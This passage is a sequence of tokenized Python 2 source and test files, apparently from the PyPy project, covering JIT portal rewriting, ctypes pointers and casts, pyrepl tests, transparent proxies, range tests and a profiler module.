. DoneWithThisFrameVoid = DoneWithThisFrameVoid <EOL> self . DoneWithThisFrameInt = DoneWithThisFrameInt <EOL> self . DoneWithThisFrameRef = DoneWithThisFrameRef <EOL> self . DoneWithThisFrameFloat = DoneWithThisFrameFloat <EOL> self . ExitFrameWithExceptionRef = ExitFrameWithExceptionRef <EOL> self . ContinueRunningNormally = ContinueRunningNormally <EOL> self . metainterp_sd . DoneWithThisFrameVoid = DoneWithThisFrameVoid <EOL> self . metainterp_sd . DoneWithThisFrameInt = DoneWithThisFrameInt <EOL> self . metainterp_sd . DoneWithThisFrameRef = DoneWithThisFrameRef <EOL> self . metainterp_sd . DoneWithThisFrameFloat = DoneWithThisFrameFloat <EOL> self . metainterp_sd . ExitFrameWithExceptionRef = ExitFrameWithExceptionRef <EOL> self . metainterp_sd . ContinueRunningNormally = ContinueRunningNormally <EOL> rtyper = self . translator . rtyper <EOL> RESULT = PORTALFUNC . RESULT <EOL> result_kind = history . getkind ( RESULT ) <EOL> ts = self . cpu . ts <EOL> def ll_portal_runner ( * args ) : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> return support . maybe_on_top_of_llinterp ( rtyper , <EOL> portal_ptr ) ( * args ) <EOL> except ContinueRunningNormally , e : <EOL> args = ( ) <EOL> for _ , name , _ in portalfunc_ARGS : <EOL> v = getattr ( e , name ) <EOL> args = args + ( v , ) <EOL> except DoneWithThisFrameVoid : <EOL> assert result_kind == '<STR_LIT>' <EOL> return <EOL> except DoneWithThisFrameInt , e : <EOL> assert result_kind == '<STR_LIT:int>' <EOL> return lltype . cast_primitive ( RESULT , e . result ) <EOL> except DoneWithThisFrameRef , e : <EOL> assert result_kind == '<STR_LIT>' <EOL> return ts . cast_from_ref ( RESULT , e . result ) <EOL> except DoneWithThisFrameFloat , e : <EOL> assert result_kind == '<STR_LIT:float>' <EOL> return e . result <EOL> except ExitFrameWithExceptionRef , e : <EOL> value = ts . cast_to_baseclass ( e . value ) <EOL> if not we_are_translated ( ) : <EOL> raise LLException ( ts . get_typeptr ( value ) , value ) <EOL> else : <EOL> value = cast_base_ptr_to_instance ( Exception , value ) <EOL> raise Exception , value <EOL> self . portal_runner_ptr = self . helper_func ( self . PTR_PORTAL_FUNCTYPE , <EOL> ll_portal_runner ) <EOL> _ , origblock , origindex = self . jit_merge_point_pos <EOL> op = origblock . operations [ origindex ] <EOL> assert op . opname == '<STR_LIT>' <EOL> assert op . args [ <NUM_LIT:0> ] . value == '<STR_LIT>' <EOL> greens_v , reds_v = decode_hp_hint_args ( op ) <EOL> vlist = [ Constant ( self . portal_runner_ptr , self . PTR_PORTAL_FUNCTYPE ) ] <EOL> vlist += greens_v <EOL> vlist += reds_v <EOL> v_result = Variable ( ) <EOL> v_result . concretetype = PORTALFUNC . RESULT <EOL> newop = SpaceOperation ( '<STR_LIT>' , vlist , v_result ) <EOL> del origblock . operations [ origindex : ] <EOL> origblock . operations . append ( newop ) <EOL> origblock . exitswitch = None <EOL> origblock . recloseblock ( Link ( [ v_result ] , origportalgraph . returnblock ) ) <EOL> checkgraph ( origportalgraph ) <EOL> def add_profiler_finish ( self ) : <EOL> def finish_profiler ( ) : <EOL> if self . metainterp_sd . profiler . initialized : <EOL> self . metainterp_sd . profiler . finish ( ) <EOL> if self . cpu . translate_support_code : <EOL> call_final_function ( self . translator , finish_profiler , <EOL> annhelper = self . annhelper ) <EOL> def rewrite_set_param ( self ) : <EOL> closures = { } <EOL> graphs = self . translator . graphs <EOL> _ , PTR_SET_PARAM_FUNCTYPE = self . cpu . ts . get_FuncType ( [ lltype . Signed ] , <EOL> lltype . Void ) <EOL> def make_closure ( fullfuncname ) : <EOL> state = self . state <EOL> def closure ( i ) : <EOL> getattr ( state , fullfuncname ) ( i ) <EOL> funcptr = self . helper_func ( PTR_SET_PARAM_FUNCTYPE , closure ) <EOL> return Constant ( funcptr , PTR_SET_PARAM_FUNCTYPE ) <EOL> for graph , block , i in find_set_param ( graphs ) : <EOL> op = block . operations [ i ] <EOL> assert op . args [ <NUM_LIT:1> ] . value == self . jitdriver <EOL> funcname = op . args [ <NUM_LIT:2> ] . value <EOL> if funcname not in closures : <EOL> closures [ funcname ] = make_closure ( '<STR_LIT>' + funcname ) <EOL> op . opname = '<STR_LIT>' <EOL> op . args [ : <NUM_LIT:3> ] = [ closures [ funcname ] ] <EOL> def decode_hp_hint_args ( op ) : <EOL> assert op . opname == '<STR_LIT>' <EOL> jitdriver = op . args [ <NUM_LIT:1> ] . value <EOL> numgreens = len ( jitdriver . greens ) <EOL> numreds = len ( jitdriver . reds ) <EOL> greens_v = op . args [ <NUM_LIT:2> : <NUM_LIT:2> + numgreens ] <EOL> reds_v = op . args [ <NUM_LIT:2> + numgreens : ] <EOL> assert len ( reds_v ) == numreds <EOL> return ( [ v for v in greens_v if v . concretetype is not lltype . Void ] , <EOL> [ v for v in reds_v if v . concretetype is not lltype . Void ] ) </s>
<s> import os <EOL> import py <EOL> from pypy . jit . tl . test import jitcrashers <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT>" ) <EOL> JIT_EXECUTABLE = py . path . local ( path ) <EOL> del path <EOL> CRASH_FILE = os . path . abspath ( jitcrashers . __file__ . rstrip ( "<STR_LIT:c>" ) ) <EOL> if not JIT_EXECUTABLE . check ( ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def setup_module ( mod ) : <EOL> mod . _old_cwd = os . getcwd ( ) <EOL> os . chdir ( str ( JIT_EXECUTABLE . dirpath ( ) ) ) <EOL> def teardown_module ( mod ) : <EOL> os . chdir ( mod . _old_cwd ) <EOL> def check_crasher ( func_name ) : <EOL> try : <EOL> JIT_EXECUTABLE . sysexec ( CRASH_FILE , func_name ) <EOL> except py . __ . process . cmdexec . ExecutionFailed , e : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print e . err <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print e . out <EOL> raise <EOL> def test_jit_crashers ( ) : <EOL> for func_name in sorted ( jitcrashers . __dict__ ) : <EOL> if func_name . startswith ( "<STR_LIT>" ) : <EOL> yield check_crasher , func_name </s>
<s> import _rawffi <EOL> from _ctypes . basics import _CData , _CDataMeta , cdata_from_address <EOL> from _ctypes . basics import sizeof , byref , keepalive_key <EOL> from _ctypes . array import Array , array_get_slice_params , array_slice_getitem , array_slice_setitem <EOL> DEFAULT_VALUE = object ( ) <EOL> class PointerType ( _CDataMeta ) : <EOL> def __new__ ( self , name , cls , typedict ) : <EOL> d = dict ( <EOL> size = _rawffi . sizeof ( '<STR_LIT:P>' ) , <EOL> align = _rawffi . alignment ( '<STR_LIT:P>' ) , <EOL> length = <NUM_LIT:1> , <EOL> _ffiargshape = '<STR_LIT:P>' , <EOL> _ffishape = '<STR_LIT:P>' , <EOL> _fficompositesize = None <EOL> ) <EOL> obj = type . __new__ ( self , name , cls , typedict ) <EOL> for k , v in d . iteritems ( ) : <EOL> setattr ( obj , k , v ) <EOL> if '<STR_LIT>' in typedict : <EOL> self . set_type ( obj , typedict [ '<STR_LIT>' ] ) <EOL> else : <EOL> def __init__ ( self , value = None ) : <EOL> raise TypeError ( "<STR_LIT>" % obj ) <EOL> obj . __init__ = __init__ <EOL> return obj <EOL> def from_param ( self , value ) : <EOL> if value is None : <EOL> return self ( None ) <EOL> if isinstance ( value , self . _type_ ) : <EOL> return byref ( value ) <EOL> if isinstance ( value , ( _Pointer , Array ) ) : <EOL> if issubclass ( type ( value ) . _type_ , self . _type_ ) : <EOL> return value <EOL> return _CDataMeta . from_param ( self , value ) <EOL> def _sizeofinstances ( self ) : <EOL> return _rawffi . sizeof ( '<STR_LIT:P>' ) <EOL> def _alignmentofinstances ( self ) : <EOL> return _rawffi . alignment ( '<STR_LIT:P>' ) <EOL> def _is_pointer_like ( self ) : <EOL> return True <EOL> def set_type ( self , TP ) : <EOL> ffiarray = _rawffi . Array ( '<STR_LIT:P>' ) <EOL> def __init__ ( self , value = None ) : <EOL> self . _buffer = ffiarray ( <NUM_LIT:1> , autofree = True ) <EOL> if value is not None : <EOL> self . contents = value <EOL> self . _ffiarray = ffiarray <EOL> self . __init__ = __init__ <EOL> self . _type_ = TP <EOL> from_address = cdata_from_address <EOL> class _Pointer ( _CData ) : <EOL> __metaclass__ = PointerType <EOL> def getcontents ( self ) : <EOL> addr = self . _buffer [ <NUM_LIT:0> ] <EOL> if addr == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . _type_ . from_address ( addr ) <EOL> def setcontents ( self , value ) : <EOL> if not isinstance ( value , self . _type_ ) : <EOL> raise TypeError ( "<STR_LIT>" % ( <EOL> self . _type_ . __name__ , type ( value ) . __name__ ) ) <EOL> self . _objects = { keepalive_key ( <NUM_LIT:1> ) : value } <EOL> if value . _ensure_objects ( ) is not None : <EOL> self . _objects [ keepalive_key ( <NUM_LIT:0> ) ] = value . _objects <EOL> value = value . _buffer <EOL> self . _buffer [ <NUM_LIT:0> ] = value <EOL> _get_slice_params = array_get_slice_params <EOL> _slice_getitem = array_slice_getitem <EOL> def _subarray ( self , index = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> address = self . _buffer [ <NUM_LIT:0> ] <EOL> address += index * sizeof ( self . _type_ ) <EOL> return self . _type_ . from_address ( address ) . _buffer <EOL> def __getitem__ ( self , index ) : <EOL> if isinstance ( index , slice ) : <EOL> return self . _slice_getitem ( index ) <EOL> return self . _type_ . _CData_output ( self . _subarray ( index ) , self , index ) <EOL> def __setitem__ ( self , index , value ) : <EOL> self . _subarray ( index ) [ <NUM_LIT:0> ] = self . _type_ . _CData_value ( value ) <EOL> def __nonzero__ ( self ) : <EOL> return self . _buffer [ <NUM_LIT:0> ] != <NUM_LIT:0> <EOL> contents = property ( getcontents , setcontents ) <EOL> def _cast_addr ( obj , _ , tp ) : <EOL> if not ( isinstance ( tp , _CDataMeta ) and tp . _is_pointer_like ( ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( tp , ) ) <EOL> if isinstance ( obj , Array ) : <EOL> ptr = tp . __new__ ( tp ) <EOL> ptr . _buffer = tp . _ffiarray ( <NUM_LIT:1> , autofree = True ) <EOL> ptr . _buffer [ <NUM_LIT:0> ] = obj . _buffer <EOL> return ptr <EOL> if isinstance ( obj , ( int , long ) ) : <EOL> result = tp ( ) <EOL> result . _buffer [ <NUM_LIT:0> ] = obj <EOL> return result <EOL> if obj is None : <EOL> result = tp ( ) <EOL> return result <EOL> if not ( isinstance ( obj , _CData ) and type ( obj ) . _is_pointer_like ( ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( type ( obj ) , ) ) <EOL> result = tp ( ) <EOL> result . _buffer [ <NUM_LIT:0> ] = obj . _buffer [ <NUM_LIT:0> ] <EOL> return result </s>
<s> from ctypes import * <EOL> import sys , py <EOL> from support import BaseCTypesTestChecker <EOL> def setup_module ( mod ) : <EOL> import conftest <EOL> mod . lib = CDLL ( str ( conftest . sofile ) ) <EOL> class TestCast ( BaseCTypesTestChecker ) : <EOL> def test_array2pointer ( self ) : <EOL> array = ( c_int * <NUM_LIT:3> ) ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> ptr = cast ( array , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> if <NUM_LIT:2> * sizeof ( c_short ) == sizeof ( c_int ) : <EOL> ptr = cast ( array , POINTER ( c_short ) ) <EOL> if sys . byteorder == "<STR_LIT>" : <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:6> ) ] == ( <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> else : <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:6> ) ] == ( <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> def test_address2pointer ( self ) : <EOL> array = ( c_int * <NUM_LIT:3> ) ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> address = addressof ( array ) <EOL> ptr = cast ( c_void_p ( address ) , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> ptr = cast ( address , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> def test_p2a_objects ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> array = ( c_char_p * <NUM_LIT:5> ) ( ) <EOL> assert array . _objects is None <EOL> array [ <NUM_LIT:0> ] = "<STR_LIT>" <EOL> assert array . _objects == { '<STR_LIT:0>' : "<STR_LIT>" } <EOL> p = cast ( array , POINTER ( c_char_p ) ) <EOL> assert p . _objects is array . _objects <EOL> assert array . _objects == { '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> p [ <NUM_LIT:0> ] = "<STR_LIT>" <EOL> assert p . _objects == { '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> assert array . _objects is p . _objects <EOL> p [ <NUM_LIT:1> ] = "<STR_LIT>" <EOL> assert p . _objects == { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> assert array . _objects is p . _objects <EOL> def test_other ( self ) : <EOL> p = cast ( ( c_int * <NUM_LIT:4> ) ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , POINTER ( c_int ) ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> c_int ( ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> p [ <NUM_LIT:2> ] = <NUM_LIT> <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> ] <EOL> c_int ( ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> ] <EOL> def test_char_p ( self ) : <EOL> s = c_char_p ( "<STR_LIT>" ) <EOL> assert cast ( cast ( s , c_void_p ) , c_char_p ) . value == ( <EOL> "<STR_LIT>" ) <EOL> try : <EOL> c_wchar_p <EOL> except NameError : <EOL> pass <EOL> else : <EOL> def test_wchar_p ( self ) : <EOL> s = c_wchar_p ( "<STR_LIT>" ) <EOL> assert cast ( cast ( s , c_void_p ) , c_wchar_p ) . value == ( <EOL> "<STR_LIT>" ) <EOL> def test_cast_functype ( self ) : <EOL> my_sqrt = lib . my_sqrt <EOL> sqrt = cast ( cast ( my_sqrt , c_void_p ) , CFUNCTYPE ( c_double , c_double ) ) <EOL> assert sqrt ( <NUM_LIT> ) == <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import ctypes <EOL> from ctypes_support import standard_c_lib as _c <EOL> open_osfhandle = _c . _open_osfhandle <EOL> open_osfhandle . argtypes = [ ctypes . c_int , ctypes . c_int ] <EOL> open_osfhandle . restype = ctypes . c_int <EOL> get_osfhandle = _c . _get_osfhandle <EOL> get_osfhandle . argtypes = [ ctypes . c_int ] <EOL> get_osfhandle . restype = ctypes . c_int <EOL> setmode = _c . _setmode <EOL> setmode . argtypes = [ ctypes . c_int , ctypes . c_int ] <EOL> setmode . restype = ctypes . c_int <EOL> del ctypes </s>
<s> from pyrepl . console import Event <EOL> from pyrepl . tests . infrastructure import ReaderTestCase , EA , run_testcase <EOL> class WishesTestCase ( ReaderTestCase ) : <EOL> def test_quoted_insert_repeat ( self ) : <EOL> self . run_test ( [ ( ( '<STR_LIT>' , '<STR_LIT:3>' ) , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] ) , <EOL> ( ( '<STR_LIT>' , '<STR_LIT>' ) , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> def test ( ) : <EOL> run_testcase ( WishesTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> from __pypy__ import tproxy <EOL> from types import MethodType <EOL> _dummy = object ( ) <EOL> origtype = type <EOL> def make_proxy ( controller , type = _dummy , obj = _dummy ) : <EOL> """<STR_LIT>""" <EOL> if type is _dummy : <EOL> if obj is _dummy : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> type = origtype ( obj ) <EOL> def perform ( opname , * args , ** kwargs ) : <EOL> operation = ProxyOperation ( tp , obj , opname , args , kwargs ) <EOL> return controller ( operation ) <EOL> tp = tproxy ( type , perform ) <EOL> return tp <EOL> class ProxyOperation ( object ) : <EOL> def __init__ ( self , proxyobj , obj , opname , args , kwargs ) : <EOL> self . proxyobj = proxyobj <EOL> self . opname = opname <EOL> self . args = args <EOL> self . kwargs = kwargs <EOL> if obj is not _dummy : <EOL> self . obj = obj <EOL> def delegate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> obj = getattr ( self , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> objattr = getattr ( obj , self . opname ) <EOL> res = objattr ( * self . args , ** self . kwargs ) <EOL> if self . opname == "<STR_LIT>" : <EOL> if ( isinstance ( res , MethodType ) and <EOL> res . im_self is self . instance ) : <EOL> res = MethodType ( res . im_func , self . proxyobj , res . im_class ) <EOL> if res is self . obj : <EOL> res = self . proxyobj <EOL> return res <EOL> def __repr__ ( self ) : <EOL> args = "<STR_LIT:U+002CU+0020>" . join ( [ repr ( x ) for x in self . args ] ) <EOL> args = "<STR_LIT>" % id ( self . proxyobj ) + args <EOL> if self . kwargs : <EOL> args += "<STR_LIT:U+002CU+0020>" . join ( [ "<STR_LIT>" % item <EOL> for item in self . kwargs . items ( ) ] ) <EOL> return "<STR_LIT>" % ( <EOL> type ( self . proxyobj ) . __name__ , self . opname , args ) </s>
<s> import autopath <EOL> class AppTestRange : <EOL> def test_range_toofew ( self ) : <EOL> raises ( TypeError , range ) <EOL> def test_range_toomany ( self ) : <EOL> raises ( TypeError , range , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> def test_range_one ( self ) : <EOL> assert range ( <NUM_LIT:1> ) == [ <NUM_LIT:0> ] <EOL> def test_range_posstartisstop ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:1> ) == [ ] <EOL> def test_range_negstartisstop ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:1> ) == [ ] <EOL> def test_range_zero ( self ) : <EOL> assert range ( <NUM_LIT:0> ) == [ ] <EOL> def test_range_twoargs ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:2> ) == [ <NUM_LIT:1> ] <EOL> def test_range_decreasingtwoargs ( self ) : <EOL> assert range ( <NUM_LIT:3> , <NUM_LIT:1> ) == [ ] <EOL> def test_range_negatives ( self ) : <EOL> assert range ( - <NUM_LIT:3> ) == [ ] <EOL> def test_range_decreasing_negativestep ( self ) : <EOL> assert range ( <NUM_LIT:5> , - <NUM_LIT:2> , - <NUM_LIT:1> ) == [ <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] <EOL> def test_range_posfencepost1 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> ] <EOL> def test_range_posfencepost2 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:11> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:10> ] <EOL> def test_range_posfencepost3 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:12> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:10> ] <EOL> def test_range_negfencepost1 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:10> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> ] <EOL> def test_range_negfencepost2 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:11> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> , - <NUM_LIT:10> ] <EOL> def test_range_negfencepost3 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:12> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> , - <NUM_LIT:10> ] <EOL> def test_range_decreasing_negativelargestep ( self ) : <EOL> assert range ( <NUM_LIT:5> , - <NUM_LIT:2> , - <NUM_LIT:3> ) == [ <NUM_LIT:5> , <NUM_LIT:2> , - <NUM_LIT:1> ] <EOL> def test_range_increasing_positivelargestep ( self ) : <EOL> assert range ( - <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> ) == [ - <NUM_LIT:5> , - <NUM_LIT:2> , <NUM_LIT:1> ] <EOL> def test_range_zerostep ( self ) : <EOL> raises ( ValueError , range , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:0> ) <EOL> def test_range_float ( self ) : <EOL> "<STR_LIT>" <EOL> assert range ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) == [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> def test_range_wrong_type ( self ) : <EOL> raises ( TypeError , range , "<STR_LIT>" ) <EOL> def test_range_object_with___int__ ( self ) : <EOL> class A ( object ) : <EOL> def __int__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> assert range ( A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> assert range ( <NUM_LIT:0> , A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:10> , A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:5> ] <EOL> def test_range_long ( self ) : <EOL> import sys <EOL> assert range ( - <NUM_LIT:2> ** <NUM_LIT:100> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , - <NUM_LIT:2> ** <NUM_LIT:100> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:100> , - <NUM_LIT:1> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:100> , - <NUM_LIT:1> ) == [ ] <EOL> a = long ( <NUM_LIT:10> * sys . maxint ) <EOL> b = long ( <NUM_LIT:100> * sys . maxint ) <EOL> c = long ( <NUM_LIT:50> * sys . maxint ) <EOL> assert range ( a , a + <NUM_LIT:2> ) == [ a , a + <NUM_LIT:1> ] <EOL> assert range ( a + <NUM_LIT:2> , a , - <NUM_LIT:1> L ) == [ a + <NUM_LIT:2> , a + <NUM_LIT:1> ] <EOL> assert range ( a + <NUM_LIT:4> , a , - <NUM_LIT:2> ) == [ a + <NUM_LIT:4> , a + <NUM_LIT:2> ] </s>
<s> from pypy . interpreter . baseobjspace import ( W_Root , ObjSpace , Wrappable , <EOL> Arguments ) <EOL> from pypy . interpreter . typedef import ( TypeDef , GetSetProperty , <EOL> interp_attrproperty ) <EOL> from pypy . interpreter . gateway import interp2app , NoneNotWrapped <EOL> from pypy . interpreter . function import Method , Function <EOL> import time , sys <EOL> class W_StatsEntry ( Wrappable ) : <EOL> def __init__ ( self , space , frame , callcount , reccallcount , tt , it , <EOL> w_sublist ) : <EOL> self . frame = frame <EOL> self . callcount = callcount <EOL> self . reccallcount = reccallcount <EOL> self . it = it <EOL> self . tt = tt <EOL> self . w_calls = w_sublist <EOL> def get_calls ( space , self ) : <EOL> return self . w_calls <EOL> def repr ( self , space ) : <EOL> frame_repr = space . str_w ( space . repr ( self . frame ) ) <EOL> if not self . w_calls : <EOL> calls_repr = "<STR_LIT:None>" <EOL> else : <EOL> calls_repr = space . str_w ( space . repr ( self . w_calls ) ) <EOL> return space . wrap ( '<STR_LIT>' % ( <EOL> frame_repr , self . callcount , self . reccallcount , <EOL> self . tt , self . it , calls_repr ) ) <EOL> repr . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def get_code ( space , self ) : <EOL> return self . frame <EOL> W_StatsEntry . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> code = GetSetProperty ( W_StatsEntry . get_code ) , <EOL> callcount = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> reccallcount = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> inlinetime = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> totaltime = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> calls = GetSetProperty ( W_StatsEntry . get_calls ) , <EOL> __repr__ = interp2app ( W_StatsEntry . repr ) , <EOL> ) <EOL> class W_StatsSubEntry ( Wrappable ) : <EOL> def __init__ ( self , space , frame , callcount , reccallcount , tt , it ) : <EOL> self . frame = frame <EOL> self . callcount = callcount <EOL> self . reccallcount = reccallcount <EOL> self . it = it <EOL> self . tt = tt <EOL> def repr ( self , space ) : <EOL> frame_repr = space . str_w ( space . repr ( self . frame ) ) <EOL> return space . wrap ( '<STR_LIT>' % ( <EOL> frame_repr , self . callcount , self . reccallcount , self . tt , self . it ) ) <EOL> repr . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def get_code ( space , self ) : <EOL> return self . frame <EOL> W_StatsSubEntry . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> code = GetSetProperty ( W_StatsSubEntry . get_code ) , <EOL> callcount = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> reccallcount = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> inlinetime = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> totaltime = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> __repr__ = interp2app ( W_StatsSubEntry . repr ) , <EOL> ) <EOL> def stats ( space , values , factor ) : <EOL> l_w = [ ] <EOL> for v in values : <EOL> if v . callcount != <NUM_LIT:0> : <EOL> l_w . append ( v . stats ( space , factor ) ) <EOL> return space . newlist ( l_w ) <EOL> class ProfilerEntry ( object ) : <EOL> def __init__ ( self , frame ) : <EOL> self . frame = frame <EOL> self . tt = <NUM_LIT:0> <EOL> self . it = <NUM_LIT:0> <EOL> self . callcount = <NUM_LIT:0> <EOL> self . recursivecallcount = <NUM_LIT:0> <EOL> self . recursionLevel = <NUM_LIT:0> <EOL> self . calls = { } <EOL> def stats ( self , space , factor ) : <EOL> if self . calls : <EOL> w_sublist = space . newlist ( [ sub_entry . stats ( space , self , factor ) <EOL> for sub_entry in self . calls . values ( ) ] ) <EOL> else : <EOL> w_sublist = space . w_None <EOL> w_se = W_StatsEntry ( space , self . frame , self . callcount , <EOL> self . recursivecallcount , <EOL> factor * self . tt , factor * self . it , w_sublist ) <EOL> return space . wrap ( w_se ) <EOL> class ProfilerSubEntry ( object ) : <EOL> def __init__ ( self , frame ) : <EOL> self . frame = frame <EOL> self . tt = <NUM_LIT:0> <EOL> self . it = <NUM_LIT:0> <EOL> self . callcount = <NUM_LIT:0> <EOL> self . recursivecallcount = <NUM_LIT:0> <EOL> self . recursionLevel = <NUM_LIT:0> <EOL> def stats ( self , space , parent , factor ) : <EOL> w_sse = W_StatsSubEntry ( space , self . frame , <EOL> self . callcount , self . recursivecallcount , <EOL> factor * self . tt , factor * self . it ) <EOL> return space . wrap ( w_sse ) <EOL> class ProfilerContext ( object ) : <EOL> def __init__ ( self , profobj , entry ) : <EOL> self . entry = entry <EOL> self . subt = <NUM_LIT:0> <EOL> self . previous = profobj . current_context <EOL> entry . recursionLevel += <NUM_LIT:1> <EOL> if profobj . subcalls and self . previous : <EOL> caller = self . previous . entry <EOL> try : <EOL> subentry = caller . calls [ entry ] <EOL> except KeyError : <EOL> subentry = ProfilerSubEntry ( entry . frame ) <EOL> caller . calls [ entry ] = subentry <EOL> subentry . recursionLevel += <NUM_LIT:1> <EOL> self . t0 = profobj . timer ( ) <EOL> def _stop ( self , profobj , entry ) : <EOL> tt = profobj . timer ( ) - self . t0 <EOL> it = tt - self . subt <EOL> if self . previous : <EOL> self . previous . subt += tt <EOL> entry . recursionLevel -= <NUM_LIT:1> <EOL> if entry . recursionLevel == <NUM_LIT:0> : <EOL> entry . tt += tt <EOL> else : <EOL> entry . recursivecallcount += <NUM_LIT:1> <EOL> entry . it += it <EOL> entry . callcount += <NUM_LIT:1> <EOL> if profobj . subcalls and self . previous : <EOL> caller = self . previous . entry <EOL> try : <EOL> subentry = caller . calls [ entry ] <EOL> except KeyError : <EOL> pass <EOL> else : 